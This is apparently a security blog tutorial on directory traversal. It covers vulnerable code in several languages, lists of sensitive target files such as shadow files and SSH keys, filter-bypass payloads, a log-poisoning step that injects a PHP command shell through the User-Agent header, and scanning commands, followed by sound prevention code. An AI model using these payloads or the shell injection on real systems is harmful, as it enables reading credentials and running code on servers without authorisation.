Directory Traversal Attacks
Thilan Dissanayaka Application Security April 09, 2020

Directory traversal is one of those vulnerabilities that makes you wonder how it still exists. The concept is dead simple — you manipulate a file path to escape the intended directory and read (or write) files elsewhere on the filesystem. A few ../ sequences, and you’re reading /etc/passwd, application config files, or source code containing database credentials.

It falls under “Broken Access Control” in the OWASP Top 10, it’s trivially easy to test for, and yet it keeps showing up, because developers keep building file paths from user input without validation.

How Directory Traversal Works

Filesystems are hierarchical. Every file has a path relative to the root:

/
├── etc/
│   ├── passwd
│   ├── shadow
│   └── hosts
├── var/
│   └── www/
│       └── html/
│           ├── index.php
│           ├── images/
│           │   ├── logo.png
│           │   └── banner.jpg
│           └── uploads/
└── home/
    └── thilan/

The .. notation means “go up one directory.” So if you’re in /var/www/html/images/ and you reference ../../, you end up at /var/www/. Chain enough ../ sequences and you reach the root — from there you can access anything the web server process has permission to read.

The attack targets any feature where user input is used to construct a file path:

  • Image/file viewers (?file=report.pdf)
  • File download endpoints (?download=document.docx)
  • Template/page includes (?page=about)
  • Language file loaders (?lang=en)

The Classic Example

A web application serves images through a PHP script:

<?php
$image = $_GET['image'];
$path = '/var/www/html/images/' . $image;

header('Content-Type: image/jpeg');
readfile($path);
?>

Normal use:

GET /view.php?image=logo.png
→ Reads: /var/www/html/images/logo.png  ✓

Attack:

GET /view.php?image=../../../../etc/passwd
→ Reads: /var/www/html/images/../../../../etc/passwd
→ Resolves to: /etc/passwd  ← Game over

The ../../../../ walks up four directories from /var/www/html/images/ to /, then descends into etc/passwd. The server happily reads the file and sends it back.

/var/www/html/images/  ← starting here
../                    → /var/www/html/
../                    → /var/www/
../                    → /var/
../                    → /
etc/passwd             → /etc/passwd
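
The walk-up above can be reproduced in a few lines. This is a minimal sketch in Python rather than PHP; it only illustrates how the path collapses and reads no files. The variable names are made up for the example.

```python
import posixpath

base = "/var/www/html/images/"
user_input = "../../../../etc/passwd"

# Naive concatenation, as in the vulnerable script
joined = base + user_input

# normpath collapses each ".." against the directory before it
resolved = posixpath.normpath(joined)

# Extra "../" sequences are harmless to the attacker: the root has no parent
deep = posixpath.normpath(base + "../" * 10 + "etc/passwd")

print(joined)    # /var/www/html/images/../../../../etc/passwd
print(resolved)  # /etc/passwd
print(deep)      # /etc/passwd
```

This is why attackers rarely bother counting directories: they over-shoot with many ../ sequences and let the root absorb the extras.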

What Attackers Target

Once you can read arbitrary files, here’s what’s valuable:

Linux Systems

# System files
../../../../etc/passwd              # User accounts (always readable)
../../../../etc/shadow              # Password hashes (usually needs root)
../../../../etc/hosts               # Network configuration
../../../../proc/self/environ       # Environment variables (may contain secrets)
../../../../proc/self/cmdline       # How the process was started

# Application files
../../../../var/www/html/config.php  # Database credentials
../../../../var/www/html/.env        # Environment configuration
../../../../var/log/apache2/access.log  # Web server logs

# SSH keys
../../../../home/thilan/.ssh/id_rsa  # Private SSH key
../../../../root/.ssh/id_rsa         # Root's private SSH key

Windows Systems

..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\inetpub\wwwroot\web.config   # IIS config with connection strings
..\..\..\..\users\administrator\.ssh\id_rsa

Note: Windows accepts both / and \ as path separators, which is important for bypass techniques.

Application Source Code

This is often more valuable than system files. Reading the application’s source code reveals:

  • Database credentials in config files
  • API keys and secrets
  • Business logic vulnerabilities
  • Other file paths to target
  • Internal API endpoints

Vulnerable Patterns Across Languages

PHP — File Inclusion

PHP’s include() and require() are especially dangerous because they don’t just read the file — they execute it as PHP code. This turns directory traversal into Remote Code Execution.

<?php
// VULNERABLE: Local File Inclusion (LFI)
$page = $_GET['page'];
include($page);
?>

GET /index.php?page=../../../../var/log/apache2/access.log

If the attacker can inject PHP code into the access log (via a crafted User-Agent header), the include() will execute it. This is the classic log poisoning technique. It only works if the web server user can read the log file. If the code appends an extension such as '.php' to the parameter, the attacker also needs a way to get rid of it (see the null byte bypass below).

# Step 1: Inject PHP into the access log via User-Agent
$ curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Step 2: Include the poisoned log file and pass a command to run
GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id

Python — Flask/Django

from flask import Flask, request, send_file

app = Flask(__name__)

@app.route('/download')
def download():
    filename = request.args.get('file')
    # VULNERABLE: User input directly in file path
    return send_file(f'/var/www/uploads/{filename}')

GET /download?file=../../../../etc/passwd

Node.js — Express

const express = require('express');
const path = require('path');

const app = express();

app.get('/files', (req, res) => {
    const filename = req.query.name;
    // VULNERABLE: path.join() normalizes ".." but does not confine the result
    const filepath = path.join(__dirname, 'public', filename);
    res.sendFile(filepath);
});

GET /files?name=../../../../etc/passwd

Note: path.join() resolves .. sequences, so path.join('/app/public', '../../../../etc/passwd') returns /etc/passwd. It does NOT prevent traversal — it just normalizes the path.
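
Python's path joining behaves the same way, with one extra surprise. The sketch below uses posixpath so the output is identical on any platform; the /app/public base is the same illustrative path as in the note above.

```python
import posixpath

base = "/app/public"

# ".." segments survive the join and are collapsed by normpath
normalized = posixpath.normpath(posixpath.join(base, "../../../../etc/passwd"))

# An absolute second argument discards the base entirely
absolute = posixpath.join(base, "/etc/passwd")

print(normalized)  # /etc/passwd
print(absolute)    # /etc/passwd
```

In Python the attacker does not even need ../ if the code joins an absolute path supplied by the user.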

Java — Servlet

@WebServlet("/download")
public class DownloadServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String filename = request.getParameter("file");
        // VULNERABLE: Direct path concatenation
        File file = new File("/var/www/uploads/" + filename);

        // try-with-resources closes the stream even if the copy fails
        try (FileInputStream fis = new FileInputStream(file)) {
            // ... stream file to response
        }
    }
}

Bypass Techniques

Developers often implement naive filters that attackers can bypass:

Bypass 1: URL Encoding

If the application blocks ../ but doesn’t decode before checking:

%2e%2e%2f                  → ../
%2e%2e/                    → ../
..%2f                      → ../
%2e%2e%5c                  → ..\  (Windows)

Double encoding (if the server decodes twice):

%252e%252e%252f            → %2e%2e%2f → ../
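
To see why the order of checking and decoding matters, here is a small sketch. naive_filter is a hypothetical stand-in for the kind of blocklist described above, not code from any real framework.

```python
from urllib.parse import unquote


def naive_filter(value: str) -> bool:
    """Hypothetical filter: accept the value only if it has no literal '../'."""
    return "../" not in value


raw = "%2e%2e%2f%2e%2e%2fetc%2fpasswd"
double = "%252e%252e%252fetc%252fpasswd"

print(naive_filter(raw))         # True: the filter sees no '../'
print(unquote(raw))              # ../../etc/passwd
print(unquote(double))           # %2e%2e%2fetc%2fpasswd
print(unquote(unquote(double)))  # ../etc/passwd
```

The filter approves the encoded string, and whichever layer decodes it later hands the traversal sequence to the filesystem call.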

Bypass 2: Null Byte (PHP < 5.3.4)

If the application appends an extension:

include($_GET['page'] . '.php');

The attacker uses a null byte to truncate the extension:

GET /index.php?page=../../../../etc/passwd%00
→ include('../../../../etc/passwd\0.php')
→ C function stops at \0 → reads /etc/passwd

This was fixed in PHP 5.3.4 but is still relevant for legacy applications.

Bypass 3: Path Truncation

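On older PHP versions (before 5.3), a path longer than the platform limit (4096 bytes on Linux) was silently truncated. Padding the payload pushes an appended extension such as .php past the limit, so it gets cut off: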

../../../../etc/passwd/./././././././././././././.  (repeat until path limit)

Bypass 4: Alternative Separators

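Windows accepts both \ and / as separators, and filters that strip ../ only once can be defeated with nested sequences:

..\..\..\..\windows\win.ini        (backslash separators, Windows)
....//....//....//etc/passwd       (becomes ../../../etc/passwd after a single-pass strip of ../)
..\/..\/..\/etc/passwd             (mixed separators)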
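
The nested-sequence trick is easiest to understand by running it against a sanitizer. strip_once below is a hypothetical example of the single-pass filter that this payload targets.

```python
def strip_once(value: str) -> str:
    """Hypothetical sanitizer: remove every '../' in a single pass."""
    return value.replace("../", "")


plain = strip_once("../../etc/passwd")
nested = strip_once("....//....//....//etc/passwd")
backslash = strip_once("..\\..\\windows\\win.ini")

print(plain)      # etc/passwd
print(nested)     # ../../../etc/passwd
print(backslash)  # ..\..\windows\win.ini
```

Removing the inner ../ from each ....// leaves a fresh ../ behind, and the backslash variant is never touched at all. Stripping patterns out of the input is fragile; validating the resolved path is the sturdier approach.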

Bypass 5: Bypassing Prefix Checks

If the application checks that the path starts with the expected directory:

$path = '/var/www/uploads/' . $_GET['file'];
if (strpos($path, '/var/www/uploads/') === 0) {
    readfile($path);  // Still vulnerable!
}

The check passes because the path starts with /var/www/uploads/ — but after ../ resolution, it escapes:

/var/www/uploads/../../../../etc/passwd
→ starts with /var/www/uploads/ ✓ (check passes)
→ resolves to /etc/passwd (traversal succeeds)
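
The difference between checking before and after resolution can be sketched in Python. Both function names are invented for the example, and normpath is used only because it is purely lexical and needs no real files; a production check would use realpath so that symlinks are resolved too.

```python
import posixpath

BASE = "/var/www/uploads/"


def naive_check(user_input: str) -> bool:
    """Mirrors the flawed check: the prefix is tested on the unresolved path."""
    path = BASE + user_input
    return path.startswith(BASE)  # always True, whatever the input


def resolved_check(user_input: str) -> bool:
    """Tests the prefix only after '..' sequences have been collapsed."""
    resolved = posixpath.normpath(BASE + user_input)
    return resolved.startswith(BASE)


attack = "../../../../etc/passwd"
print(naive_check(attack))           # True
print(resolved_check(attack))        # False
print(resolved_check("report.pdf"))  # True
```

The naive check can never fail, because the application itself put the prefix there.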

Prevention

1. Use basename() — Strip the Path Entirely

The simplest and most effective fix: use basename() to extract just the filename, discarding any directory components.

<?php
$filename = basename($_GET['file']);  // "../../../../etc/passwd" → "passwd"
$path = '/var/www/uploads/' . $filename;

// is_file() also rejects directories, e.g. when basename() returns ".."
if (is_file($path)) {
    readfile($path);
} else {
    http_response_code(404);
    echo "File not found";
}
?>

This is the nuclear option — it completely removes any directory traversal. Use it when the user should only specify a filename, never a path.
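
The same idea in Python, as a rough sketch. safe_name is a hypothetical helper. Treating backslashes as separators is an assumption made here so that Windows-style payloads are reduced as well, and the rejection of "", "." and ".." covers the inputs for which a basename is not a usable filename.

```python
import posixpath
from typing import Optional


def safe_name(user_input: str) -> Optional[str]:
    """Reduce user input to a bare filename, or return None if nothing usable is left."""
    # Assumption: treat backslashes as separators too
    name = posixpath.basename(user_input.replace("\\", "/"))
    if name in ("", ".", ".."):
        return None
    return name


print(safe_name("../../../../etc/passwd"))    # passwd
print(safe_name("..\\..\\windows\\win.ini"))  # win.ini
print(safe_name("logo.png"))                  # logo.png
print(safe_name(".."))                        # None
```

The attacker can still ask for a file called passwd, but only inside the upload directory.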

2. Validate with realpath() — Verify After Resolution

Resolve the full path and verify it’s within the expected directory:

<?php
$baseDir = '/var/www/uploads/';
$filename = $_GET['file'];

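$realBase = realpath($baseDir);
$fullPath = realpath($baseDir . $filename);

// Check that:
// 1. realpath() succeeded for both paths (the file exists)
// 2. The resolved path is inside the base directory. The trailing separator
//    stops a sibling such as /var/www/uploads_old from matching the prefix.
if ($realBase !== false && $fullPath !== false
    && strpos($fullPath, $realBase . DIRECTORY_SEPARATOR) === 0) {
    readfile($fullPath);
} else {
    http_response_code(403);
    echo "Access denied";
}
?>

This handles the traversal bypasses above: realpath() resolves ../ sequences and symlinks to the actual filesystem path, and we then verify the result is within our allowed directory. Note that realpath() does not decode URL encoding. PHP decodes $_GET values once on its own, so the check is only reliable if nothing decodes the value again afterwards.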

3. Whitelist / ID Mapping — Don’t Use Filenames at All

The most secure approach: never let users specify filenames. Use an ID that maps to a predefined file:

<?php
$fileMap = [
    '1' => '/var/www/uploads/report-q1.pdf',
    '2' => '/var/www/uploads/report-q2.pdf',
    '3' => '/var/www/uploads/brochure.pdf',
];

$id = $_GET['id'] ?? '';

// Only string IDs that exist in the map are served
if (is_string($id) && isset($fileMap[$id])) {
    readfile($fileMap[$id]);
} else {
    http_response_code(404);
    echo "File not found";
}
?>

No user-controlled path. No traversal possible. The attacker can only access files you explicitly listed.
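
A hard-coded map works for a fixed set of files. For user uploads, one possible variation is to hand out a random ID at upload time and keep the ID-to-path table on the server. The FileRegistry class below is a hypothetical in-memory sketch; a real application would more likely keep this table in a database.

```python
import secrets
from typing import Dict, Optional


class FileRegistry:
    """Hypothetical in-memory table mapping opaque IDs to server-side paths."""

    def __init__(self) -> None:
        self._paths: Dict[str, str] = {}

    def register(self, server_path: str) -> str:
        """Store a path chosen by the server and return a random ID for it."""
        file_id = secrets.token_urlsafe(16)
        self._paths[file_id] = server_path
        return file_id

    def resolve(self, file_id: str) -> Optional[str]:
        """Return the stored path, or None for any ID that was never issued."""
        return self._paths.get(file_id)


registry = FileRegistry()
report_id = registry.register("/var/www/uploads/report-q1.pdf")

print(registry.resolve(report_id))                 # /var/www/uploads/report-q1.pdf
print(registry.resolve("../../../../etc/passwd"))  # None
```

User input is only ever used as a dictionary key, so it never reaches a filesystem call.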

4. Python — Secure Path Handling

import os
from flask import Flask, request, send_file, abort

app = Flask(__name__)
UPLOAD_DIR = '/var/www/uploads'

@app.route('/download')
def download():
    filename = request.args.get('file', '')

    # Resolve the full path
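    # Resolve the full path (follows symlinks and collapses "..")
    base = os.path.realpath(UPLOAD_DIR)
    full_path = os.path.realpath(os.path.join(base, filename))

    # Verify it's within the upload directory. commonpath() compares whole
    # path components, so /var/www/uploads_old does not pass as a prefix match.
    if os.path.commonpath([base, full_path]) != base:
        abort(403)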

    if not os.path.isfile(full_path):
        abort(404)

    return send_file(full_path)
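
A bare string-prefix comparison has a subtle edge case: a sibling directory whose name merely starts with the base name also matches. The sketch below shows this with temporary directories and a component-wise check built on os.path.commonpath. is_within and the directory names are made up for the example.

```python
import os
import tempfile


def is_within(base_dir: str, user_path: str) -> bool:
    """True if user_path, resolved against base_dir, stays inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath compares whole components, not raw characters
    return os.path.commonpath([base, target]) == base


with tempfile.TemporaryDirectory() as root:
    uploads = os.path.join(root, "uploads")
    os.makedirs(uploads)
    os.makedirs(os.path.join(root, "uploads_private"))

    sneaky = "../uploads_private/secret.txt"
    resolved = os.path.realpath(os.path.join(uploads, sneaky))

    # Raw prefix test: fooled by the shared "uploads" prefix
    prefix_says = resolved.startswith(os.path.realpath(uploads))
    # Component-wise test: correctly rejects the sibling directory
    component_says = is_within(uploads, sneaky)
    normal_file = is_within(uploads, "report.pdf")

print(prefix_says)     # True
print(component_says)  # False
print(normal_file)     # True
```

Appending a trailing separator to the base before calling startswith() closes the same gap.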

5. Node.js — Secure Path Handling

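const express = require('express');
const path = require('path');
const fs = require('fs');

const app = express();
const UPLOAD_DIR = path.resolve(__dirname, 'uploads');

app.get('/files', (req, res) => {
    const filename = req.query.name;
    if (typeof filename !== 'string') {
        return res.status(400).send('Bad request');
    }

    const fullPath = path.resolve(UPLOAD_DIR, filename);

    // Verify the resolved path is within our directory. The trailing
    // separator keeps a sibling like "uploads_old" from passing the check.
    if (!fullPath.startsWith(UPLOAD_DIR + path.sep)) {
        return res.status(403).send('Access denied');
    }

    if (!fs.existsSync(fullPath)) {
        return res.status(404).send('Not found');
    }

    res.sendFile(fullPath);
});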

The pattern is the same in every language: resolve the full path, then verify it’s within the allowed directory.

6. Web Server Configuration

As an additional layer, configure your web server to restrict file access:

# Nginx — restrict access to sensitive files
location ~ /\. {
    deny all;  # Block dotfiles (.env, .git, .htaccess)
}

location ~* \.(conf|ini|log|sh|sql)$ {
    deny all;  # Block sensitive file extensions
}

# Apache: same rules in .htaccess
<FilesMatch "\.(conf|ini|log|sh|sql|env)$">
    Require all denied
</FilesMatch>

Testing for Directory Traversal

Manual Testing

# Basic traversal
curl "http://target.com/view?file=../../../../etc/passwd"

# URL encoded
curl "http://target.com/view?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double encoded
curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"

# Null byte (legacy PHP)
curl "http://target.com/view?file=../../../../etc/passwd%00"

# Windows paths
curl "http://target.com/view?file=..\..\..\..\windows\win.ini"

With Burp Suite

Intruder with a wordlist of traversal payloads is the fastest approach. The dotdotpwn wordlist covers hundreds of encoding variations.

Automated

# Using ffuf with a traversal wordlist
$ ffuf -u "http://target.com/view?file=FUZZ" -w traversal-payloads.txt -mc 200

# Using dotdotpwn
$ dotdotpwn -m http -h target.com -f /etc/passwd
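
If no wordlist is at hand, a small one can be generated. The script below is a rough sketch that covers only the variants discussed in this post (plain, URL-encoded, double-encoded, nested, and backslash). The function names are invented, and it is far less thorough than a dedicated tool.

```python
from typing import List


def encode(s: str) -> str:
    """Percent-encode only dots and slashes."""
    return s.replace(".", "%2e").replace("/", "%2f")


def double_encode(s: str) -> str:
    """Encode once, then encode the percent signs again."""
    return encode(s).replace("%", "%25")


def traversal_payloads(target: str = "etc/passwd", max_depth: int = 4) -> List[str]:
    """Build payload variants for 1..max_depth directory levels."""
    payloads: List[str] = []
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + target
        payloads += [
            plain,
            encode(plain),
            double_encode(plain),
            "....//" * depth + target,                   # survives a single-pass strip
            "..\\" * depth + target.replace("/", "\\"),  # Windows separators
        ]
    return payloads


payloads = traversal_payloads()
print(len(payloads))  # 20
print(payloads[0])    # ../etc/passwd
```

Writing "\n".join(payloads) to traversal-payloads.txt gives a file that can be passed to ffuf with -w as in the command above.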

Final Thoughts

Directory traversal is a solved problem from a technical standpoint. The fix is well-known: resolve the path, validate it’s within the allowed directory. realpath() + prefix check, or basename(), or ID mapping — pick any of them and the vulnerability disappears.

Yet it keeps showing up in production code because developers build file paths from user input without thinking about it. Every open(), include(), readfile(), send_file(), or readFileSync() that touches user input is a potential traversal point.

The mental model is simple: never trust a user-controlled path. Validate it after resolution, not before. And when possible, don’t use paths at all — use IDs that map to files server-side.

Thanks for reading!
